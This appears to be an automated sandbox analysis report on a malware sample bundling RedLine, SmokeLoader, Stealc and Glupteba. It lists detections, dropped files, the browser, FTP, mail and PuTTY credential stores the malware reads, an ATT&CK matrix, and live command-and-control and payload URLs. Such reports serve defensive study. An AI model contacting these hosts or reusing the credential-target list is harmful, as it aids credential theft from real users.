Source: Yara match	File source: 00000016.00000003.2459792248.0000000003C82000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2603121419.0000000003393000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2581006895.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 14.0.28CC.exe.d40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.2389009297.0000000000D42000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\28CC.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: 33.3.5AAB.exe.2080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.5AAB.exe.2070e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.eieeggj.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.eieeggj.480e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.16GAuqLUFK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.16GAuqLUFK.exe.4d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.5AAB.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.toolspub2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.eieeggj.490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.16GAuqLUFK.exe.4e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.toolspub2.exe.5c15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2280019076.0000000001FB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2567378740.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2228963618.0000000000490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2279751170.0000000000490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.2513498191.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2042498408.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2042178550.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1978169987.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2566695195.0000000000510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.nsn5FE8.tmp.exe.7b0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.nsn5FE8.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.nsn5FE8.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.3186779959.00000000022C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.2555550237.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.3185354932.0000000000400000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.3185992517.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\user\AppData\Local\Temp\16E6.exe

Code function: \Google\Chrome\User Data\Default\Login Data

7_2_00401250

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.5:49743 -> 46.246.96.149:80

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	File opened: C:\Users\user\AppData\Local\Opera Software\Opera Stable\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: C:\Windows\SysWOW64\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: C:\Users\user\AppData\Local\Temp\16E6.exe

Directory queried: C:\Users\user\Documents

Jump to behavior

Source: Yara match	File source: 14.0.28CC.exe.d40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.nsn5FE8.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.2389009297.0000000000D42000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\28CC.exe, type: DROPPED

Remote Access Functionality

Yara detected Glupteba

Source: Yara match	File source: 22.2.288c47bbc1871b439df19ff4df68f076.exe.2f50e67.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.288c47bbc1871b439df19ff4df68f076.exe.3840000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.288c47bbc1871b439df19ff4df68f076.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.2459792248.0000000003C82000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2603121419.0000000003393000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2581006895.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 14.0.28CC.exe.d40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.2389009297.0000000000D42000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\28CC.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: 33.3.5AAB.exe.2080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.5AAB.exe.2070e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.eieeggj.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.eieeggj.480e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.16GAuqLUFK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.16GAuqLUFK.exe.4d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.5AAB.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.toolspub2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.eieeggj.490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.16GAuqLUFK.exe.4e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.toolspub2.exe.5c15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2280019076.0000000001FB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2567378740.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2228963618.0000000000490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2279751170.0000000000490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.2513498191.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2042498408.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2042178550.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1978169987.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2566695195.0000000000510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.nsn5FE8.tmp.exe.7b0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.nsn5FE8.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.nsn5FE8.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.3186779959.00000000022C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.2555550237.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.3185354932.0000000000400000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.3185992517.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	231 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	3 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	13 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	1 Native API	11 Registry Run Keys / Startup Folder	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	12 File and Directory Discovery	Remote Desktop Protocol	21 Data from Local System	Exfiltration Over Bluetooth	21 Encrypted Channel	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	712 Process Injection	1 Abuse Elevation Control Mechanism	1 Credentials In Files	157 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	1 Non-Standard Port			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	11 Registry Run Keys / Startup Folder	3 Obfuscated Files or Information	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	Traffic Duplication	1 Multi-hop Proxy			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	23 Software Packing	LSA Secrets	661 Security Software Discovery	SSH	Keylogging	Scheduled Transfer	4 Non-Application Layer Protocol			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	451 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Data Transfer Size Limits	125 Application Layer Protocol			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	2 Proxy			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies
Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	451 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Web Protocols			Internal Defacement	Malvertising	Network Topology
Supply Chain Compromise	PowerShell	Cron	Cron	712 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	File Transfer Protocols			External Defacement	Compromise Infrastructure	IP Addresses
Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Files and Directories	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Exfiltration Over Unencrypted Non-C2 Protocol	Mail Protocols			Firmware Corruption	Domains	Network Security Appliances
Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Regsvr32	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	Exfiltration Over Physical Medium	DNS			Resource Hijacking	DNS Server	Gather Victim Org Information

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
16GAuqLUFK.exe	70%	ReversingLabs	Win32.Trojan.Privateloader
16GAuqLUFK.exe	78%	Virustotal		Browse
16GAuqLUFK.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\Drivers\csrss.exe	100%	Avira	HEUR/AGEN.1316840
C:\ProgramData\Drivers\csrss.exe	100%	Joe Sandbox ML
C:\ProgramData\Drivers\csrss.exe	91%	ReversingLabs	Win32.Trojan.SmokeLoader
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\16E6.exe	43%	ReversingLabs	Win32.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\1C75.dll	59%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\23F8.exe	39%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	46%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\28CC.exe	87%	ReversingLabs	ByteCode-MSIL.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\3ABE.exe	73%	ReversingLabs	ByteCode-MSIL.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\820.exe	91%	ReversingLabs	Win32.Trojan.SmokeLoader
C:\Users\user\AppData\Local\Temp\BroomSetup.exe	30%	ReversingLabs	Win32.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\InstallSetup9.exe	58%	ReversingLabs	Win32.Downloader.Taily
C:\Users\user\AppData\Local\Temp\is-6V76P.tmp\6ED0.tmp	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsk58E2.tmp\INetC.dll	2%	ReversingLabs
C:\Users\user\AppData\Local\Temp\toolspub2.exe	51%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Roaming\eieeggj	70%	ReversingLabs	Win32.Trojan.Privateloader
C:\Users\user\AppData\Roaming\ireeggj	51%	ReversingLabs	Win32.Trojan.Smokeloader

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
ftpvoyager.cc	18%	Virustotal		Browse
cream.hitsturbo.com	20%	Virustotal		Browse
lightseinsteniki.org	21%	Virustotal		Browse
politefrightenpowoa.pw	100%	URL Reputation	malware
politefrightenpowoa.pw	100%	URL Reputation	malware
opposesicknessopw.pw	0%	URL Reputation	safe
chincenterblandwka.pw	0%	Virustotal		Browse
liuliuoumumy.org	21%	Virustotal		Browse
snukerukeutit.org	22%	Virustotal		Browse
reviveincapablewew.pw	13%	Virustotal		Browse
onualituyrs.org	20%	Virustotal		Browse
stualialuyastrelia.net	23%	Virustotal		Browse
sumagulituyo.org	22%	Virustotal		Browse
host-host-file8.com	20%	Virustotal		Browse
host-file-host6.com	21%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://word.office.comon	0%	URL Reputation	safe
http://liuliuoumumy.org/	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://host-host-file8.com/	100%	URL Reputation	malware
http://tonimiuyaytre.org/	0%	URL Reputation	safe
https:///phpMyAdmin//PhpMyAdmin//pma/rootmysqlimapssmtpspop3sscp://your_IP_is_greylisted_README.txt2	0%	Avira URL Cloud	safe
http://tyiuiunuewqy.org/	0%	URL Reputation	safe
http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onion/upd.php?n=64F78ABE71A43EFA66FB	0%	Avira URL Cloud	safe
http://snukerukeutit.org/	0%	URL Reputation	safe
http://stualialuyastrelia.net/	0%	URL Reputation	safe
http://sumagulituyo.org/	100%	URL Reputation	malware
http://lightseinsteniki.org/	0%	URL Reputation	safe
http://crl.v	0%	URL Reputation	safe
http://46.246.96.149/testdownload	0%	Avira URL Cloud	safe
http://46.246.96.149/getpu	0%	Avira URL Cloud	safe
http://77.91.76.36/f059ec3d7eb90876/softokn3.dll	100%	Avira URL Cloud	malware
https://login.live.co	0%	Avira URL Cloud	safe
https://curl.se/docs/hsts.html	0%	Avira URL Cloud	safe
http://77.91.76.36/f059ec3d7eb90876/softokn3.dll	22%	Virustotal		Browse
https://curl.se/docs/alt-svc.html#	0%	Avira URL Cloud	safe
https://login.live.co	0%	Virustotal		Browse
http://46.246.96.149/testdownload	0%	Virustotal		Browse
https://curl.se/docs/alt-svc.html#	0%	Virustotal		Browse
http://46.246.96.149/getpu	0%	Virustotal		Browse
http://91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab	100%	Avira URL Cloud	malware
http://46.246.96.149/connect	0%	Avira URL Cloud	safe
http://46.246.96.149/sendcookies	0%	Avira URL Cloud	safe
https://curl.se/docs/hsts.html#	0%	Avira URL Cloud	safe
http://77.91.76.36/f059ec3d7eb90876/sqlite3.dll	100%	Avira URL Cloud	malware
https://curl.se/docs/hsts.html	0%	Virustotal		Browse
http://HTTP://HTTPS://https://httpclientcpp-agent/1.0	0%	Avira URL Cloud	safe
http://5.42.64.35/syncUpd.exe	100%	Avira URL Cloud	malware
http://77.91.76.36/f059ec3d7eb90876/nss3.dll	100%	Avira URL Cloud	malware
http://46.246.96.149/proccesses	0%	Avira URL Cloud	safe
https://curl.se/docs/hsts.html#	0%	Virustotal		Browse
http://77.91.76.36/f059ec3d7eb90876/sqlite3.dll	21%	Virustotal		Browse
http://5.42.65.125/288c47bbc1871b42239df19ff4df68f076.exe	100%	Avira URL Cloud	malware
http://46.246.96.149/connect	0%	Virustotal		Browse
http://46.246.96.149/sendcookies	0%	Virustotal		Browse
http://77.91.76.36/f059ec3d7eb90876/nss3.dll	22%	Virustotal		Browse
https://chincenterblandwka.pw/api	0%	Avira URL Cloud	safe
http://5.42.64.35/syncUpd.exe	23%	Virustotal		Browse
http://77.91.76.36/f059ec3d7eb90876/mozglue.dll	100%	Avira URL Cloud	malware
http://46.246.96.149/proccesses	0%	Virustotal		Browse
http://46.246.96.149/	0%	Avira URL Cloud	safe
http://ftpvoyager.cc/ftp/index.php	100%	Avira URL Cloud	malware
http://5.42.65.125/288c47bbc1871b42239df19ff4df68f076.exe	20%	Virustotal		Browse
http://77.91.76.36/f059ec3d7eb90876/vcruntime140.dll	100%	Avira URL Cloud	malware
https://curl.se/docs/http-cookies.html	0%	Avira URL Cloud	safe
http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/re	0%	Avira URL Cloud	safe
http://cream.hitsturbo.com/order/tuc5.exe	100%	Avira URL Cloud	malware
http://77.91.76.36/f059ec3d7eb90876/vcruntime140.dll	22%	Virustotal		Browse
http://46.246.96.149/getcommands	0%	Avira URL Cloud	safe
http://77.91.76.36/f059ec3d7eb90876/mozglue.dll	22%	Virustotal		Browse
https://curl.se/docs/http-cookies.html	0%	Virustotal		Browse
http://77.91.76.36/f059ec3d7eb90876/freebl3.dll	100%	Avira URL Cloud	malware
http://ftpvoyager.cc/ftp/index.php	3%	Virustotal		Browse
https://curl.se/docs/alt-svc.html	0%	Avira URL Cloud	safe
http://cream.hitsturbo.com/order/tuc5.exe	23%	Virustotal		Browse
http://46.246.96.149/browsers	0%	Avira URL Cloud	safe
http://46.246.96.149/defenders	0%	Avira URL Cloud	safe
https://chincenterblandwka.pw/api	0%	Virustotal		Browse
http://77.91.76.36/f059ec3d7eb90876/msvcp140.dll	0%	Avira URL Cloud	safe
http://46.246.96.149/e_userGoogle	0%	Avira URL Cloud	safe
https://sabotage.net	0%	Avira URL Cloud	safe
http://77.91.76.36/f059ec3d7eb90876/freebl3.dll	22%	Virustotal		Browse
http://46.246.96.149/getcommands	0%	Virustotal		Browse
http://77.91.76.36/3886d2276f6914c4.php	0%	Avira URL Cloud	safe
http://46.246.96.149/	0%	Virustotal		Browse
http://46.246.96.149/osinfo	0%	Avira URL Cloud	safe
https://curl.se/docs/alt-svc.html	0%	Virustotal		Browse
https://curl.se/docs/http-cookies.html#	0%	Avira URL Cloud	safe
http://46.246.96.149/softwares	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ftpvoyager.cc	195.158.3.162	true	true	18%, Virustotal, Browse	unknown
cream.hitsturbo.com	172.67.168.30	true	true	20%, Virustotal, Browse	unknown
lightseinsteniki.org	34.143.166.163	true	true	21%, Virustotal, Browse	unknown
chincenterblandwka.pw	172.67.176.11	true	false	0%, Virustotal, Browse	unknown
api4.ipify.org	173.231.16.77	true	false		high
zonealarm.com	209.87.209.205	true	false		high
stualialuyastrelia.net	91.215.85.17	true	true	23%, Virustotal, Browse	unknown
multisite3.geo.kaspersky.com	185.85.15.47	true	false		high
iplogger.com	172.67.188.178	true	false		high
snukerukeutit.org	104.198.2.251	true	false	22%, Virustotal, Browse	unknown
sumagulituyo.org	34.94.245.237	true	false	22%, Virustotal, Browse	unknown
liuliuoumumy.org	34.143.166.163	true	true	21%, Virustotal, Browse	unknown
host-host-file8.com	158.160.130.138	true	true	20%, Virustotal, Browse	unknown
usa.kaspersky.com	unknown	unknown	false		high
onualituyrs.org	unknown	unknown	true	20%, Virustotal, Browse	unknown
reviveincapablewew.pw	unknown	unknown	true	13%, Virustotal, Browse	unknown
politefrightenpowoa.pw	unknown	unknown	true	100%, URL Reputation 100%, URL Reputation	unknown
www.kaspersky.com	unknown	unknown	false		high
host-file-host6.com	unknown	unknown	true	21%, Virustotal, Browse	unknown
opposesicknessopw.pw	unknown	unknown	true	0%, URL Reputation	unknown
api.ipify.org	unknown	unknown	false		high
www.zonealarm.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://liuliuoumumy.org/	true	URL Reputation: safe	unknown
http://77.91.76.36/f059ec3d7eb90876/softokn3.dll	true	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://46.246.96.149/getpu	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://host-host-file8.com/	true	URL Reputation: malware	unknown
http://tonimiuyaytre.org/	true	URL Reputation: safe	unknown
http://46.246.96.149/testdownload	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab	false	Avira URL Cloud: malware	unknown
http://46.246.96.149/connect	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://46.246.96.149/sendcookies	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.91.76.36/f059ec3d7eb90876/sqlite3.dll	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://5.42.64.35/syncUpd.exe	false	23%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://77.91.76.36/f059ec3d7eb90876/nss3.dll	true	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://46.246.96.149/proccesses	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://5.42.65.125/288c47bbc1871b42239df19ff4df68f076.exe	true	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://chincenterblandwka.pw/api	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.91.76.36/f059ec3d7eb90876/mozglue.dll	true	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ftpvoyager.cc/ftp/index.php	true	3%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://usa.kaspersky.com/	false		high
http://77.91.76.36/f059ec3d7eb90876/vcruntime140.dll	true	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://tyiuiunuewqy.org/	true	URL Reputation: safe	unknown
http://snukerukeutit.org/	false	URL Reputation: safe	unknown
http://stualialuyastrelia.net/	true	URL Reputation: safe	unknown
